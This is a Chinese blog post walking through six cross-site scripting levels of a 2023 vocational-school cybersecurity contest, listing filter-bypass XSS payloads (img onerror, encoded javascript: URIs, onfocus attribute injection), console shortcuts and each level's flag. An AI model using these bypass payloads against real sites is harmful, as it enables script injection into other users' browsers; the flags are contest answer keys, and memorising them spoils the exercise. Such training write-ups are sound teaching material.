2023年中职“网络安全“—跨站脚本渗透①

已于 2023-11-15 14:57:41 修改
阅读量599 收藏 11
点赞数 6
分类专栏: 中职网络安全 文章标签: web安全 安全 网络安全 xss 安全性测试
于 2023-06-02 17:22:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57060854/article/details/131010570
版权

2023年中职"网络安全"—网络跨站脚本渗透①

跨站脚本渗透

任务环境说明:

 服务器场景:Server2125(关闭链接)
 服务器场景操作系统:未知

1. 访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/1/?name=</h2><img src=1 onerror=alert(1)>


解法二:F12打开控制台,输入 alert(1) 回车


解法三:F12打开控制台,输入 b64_md5('simple') 回车

flag:jb3aSPuHSNZ0bxllgk6Wag

2. 访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/2/index.php?keyword="</h2><img SRC=1 ONERROR=alert(1)>&submit=搜索


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('relaxed') 回车

flag:gfMr4koqYvxHLMQ+3JfmWw

3. 访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    先把javascript:alert(1)转换成HTML编码


    (1)输入进去,回车
    (2)然后在点击友情链接


解法二:
    在url中的keyword参数后输出javas%09cript:alert(1)
    然后在点击友情链接


解法三:F12打开控制台,输入 alert() 回车


解法四:F12打开控制台,输入 b64_md5('challenge') 回车

flag:sE7ArePUm0oHnw4gfV4oIQ

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:
    使用Win7的谷歌浏览器,发现了这些


    " οnfοcus="alert(1)" type=text "
    提交Cookie后点击一下input框,就会弹出来
    其他触发事件也可以,不值可以用onfocus


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('commonly') 回车

flag:nQO7ofm1/wzUgGBnrR55qg

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

我怀疑这题有问题,这题应该对应XSS-Labs第15关
解法一:F12打开控制台,输入 alert(1) 回车


解法二:F12打开控制台,输入 b64_md5('Uncomfortable') 回车

flag:QmRhA990viE8yP/PWbnKhw

6. 访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

解法一:http://靶机IP/6/?keyword=%3Cimg%0Asrc=1%0Dοnerrοr=alert()%3E


解法二:F12打开控制台,输入 alert() 回车


解法三:F12打开控制台,输入 b64_md5('finis') 回车

flag:LHOm3XR7ig6+hgo2Zd/Y6g

总结

这种题目考的就是过滤,只要多打靶机,做起来还是没有问题的。
XSS-Labs

acaciaf
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023全国职业院校技能大赛中职网络安全竞赛试题B模块安徽省——跨站脚本攻击(超详细)
Jay
03-30 247
4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交
江西 网页渗透-21
zx66661的博客
04-25 863
1.访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交; 抓包 更改User-Agent:的内容 Flag:zTdKVpUKJu 2.访问服务器网站目录2,根据页面信息完成条件,将获取到的flag提交; 根据题目要求,添加ip,通过抓包获得flag Flag:6i3zXHDPOx 3.访问服务器网站目录3,根据页面信息完成条件,将获取到的flag提交 发现 payload = id=2' or sleep(3)#
中职网络安全C模块脚本.rar
06-09
中职网络安全python脚本 新规程C模块的脚本,有mysql、vsftpd和ping三个脚本,三个脚本结合使用渗透靶机获取flag,mysql、vsftpd都是linux渗透linux的,ping是windows和linnux都可使用,如购买有问题可私信博主
2022网络安全”赛项驻马店市赛选拔赛 任务书
Aluxian_的博客
11-16 2191
2.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/www目录唯一一个后缀为.bmp的图片文件的英文单词作为Flag提交;4.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/var/vsftpd目录唯一一个后缀为.docx文件的文件内容作为Flag提交;6.通过本地PC渗透测试平台Kali对服务器场景进行渗透测试,将该场景/home/guest目录唯一一个后缀为.pdf文件的文件内容作为Flag提交
2022-2023中职网络安全web渗透任务整理合集
旺仔Sec&blog
02-25 3271
2022-2023中职网络安全web渗透任务整理合集
2023安徽省职业院校“磐云杯”网络安全竞赛
m0_45155797的博客
04-06 201
镜像名:Server2121操作有什么问题,麻烦师傅们指出!
B-8:网页渗透
m0_45155797的博客
04-13 421
B-8:网页渗透 任务环境说明:  服务器场景:Server2127(关闭链接)  服务器场景操作系统:未知 1. 访问服务器网站目录1,根据页面信息完成条件,将页面的flag提交; 2. 访问服务器网站目录2,根据页面信息完成条件,将页面的flag提交; 3. 访问服务器网站目录3,根据页面信息完成条件,将页面的flag提交; 4. 访问服务器网站目录4,根据页面信息完成条件,将页面的flag提交; 5. 访问服务器网站目录5,根据页面信息完成条件,将页面的flag提交; 6. 访问服务器
2022中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境
07-06
2022中职网络安全广东省技能竞赛代码渗透测试flag0072渗透环境
2023内蒙古自治区中职网络安全赛题-B模块
06-01
内容概要:2023内蒙古自治区中职网络安全赛题,主要考点为web,系统安全,misc,数据分析。 适合人群:正在学习网络安全的小白,和在中职网络安全比赛的选手,具备一定的网络安全知识体系基础。 能学到什么:...
2023中职网络建设与运维
03-29
随着网络和信息化水平的不断发展,网络安全事件也层出不穷,网络恶意代码传播、信息窃取、信息篡改、远程控制等各种网络攻击行为已严重威胁到信息系统的机密性、完整性和可用性。因此,对抗网络攻击,组织安全事件...
2023中职组“网络安全”赛项吉安市任务书
05-31
2023中职组“网络安全”赛项吉安市任务书
2021江西省“网络安全”赛题B-10:网页渗透—21
依旧是寻觅
09-26 118
,访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交
B-1:CMS网站渗透
m0_45155797的博客
04-13 496
B-1:CMS网站渗透 2022中职组“网络安全”赛项 宁波市选拔赛 任务环境说明:  服务器场景:Server2206(关闭链接)  服务器场景操作系统:未知 1. 使用渗透机对服务器信息收集,并将服务器网站服务端口号作为flag提交; 2. 使用渗透机对服务器信息收集,将网站的名称作为flag提交; 3. 使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交; 4. 使用渗透机对服务器渗透,并将网站所用的数据库的表名作为flag提交
2023网络安全比赛--跨站脚本攻击②中职组(超详细)
Aluxian_的博客
02-08 1519
1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;4.访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;5.访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交
2023网络安全比赛--跨站脚本攻击中职组(超详细)
Aluxian_的博客
01-12 8288
1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;4.访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;5.访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交
2022中职组云南省昆明市网络安全竞赛试题
旺仔Sec&blog
01-17 1680
2022中职组云南省昆明市网络安全竞赛试题
2023中职网络安全技能竞赛网页渗透(注入版)
旺仔Sec&blog
01-18 3758
2023中职网络安全技能竞赛网页渗透(注入版)
2023中职网络安全竞赛跨站脚本渗透解析-1(超详细)
旺仔Sec&blog
02-21 1857
2023中职网络安全竞赛跨站脚本渗透解析-1(超详细)
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 554
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
2023中职网络安全江西 web安全渗透测试
09-22
2023中职教育网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,包括网络原理、服务器的架设与维护、网站开发等方面的知识,确保学生对网络技术有深入的理解。学习基础知识可以为学生之后的学习和实践奠定坚实的基础。 其次,学生将学习web安全渗透测试的基本概念和原理,并通过案例分析和实践操作来加深理解。课程将引导学生了解常见的web安全漏洞,如跨站脚本攻击(XSS)、SQL注入攻击等,以及如何进行渗透测试来发现并修复这些漏洞。 此外,课程还将重点介绍江西地区的网络安全现状和需求,引导学生了解区域特色和行业需求,培养适应地方发展的能力。学生将有机会参与实际的安全渗透测试项目,深入了解江西地区的网络安全挑战,提升解决问题的能力。 最后,学生将通过实践实验和项目实训来提高技能。他们将学习使用先进的渗透测试工具和技术,如Burp Suite、Nessus等,进行安全漏洞扫描和渗透测试。通过实践训练,学生将能够掌握常见的web安全漏洞修复和防范方法。 总之,2023中职网络安全课程包含江西web安全渗透测试内容,旨在培养学生的基础知识和技能,让他们能够应对江西地区的网络安全挑战。通过这样的培养,我们可以为江西地区的网络安全建设和发展做出积极贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值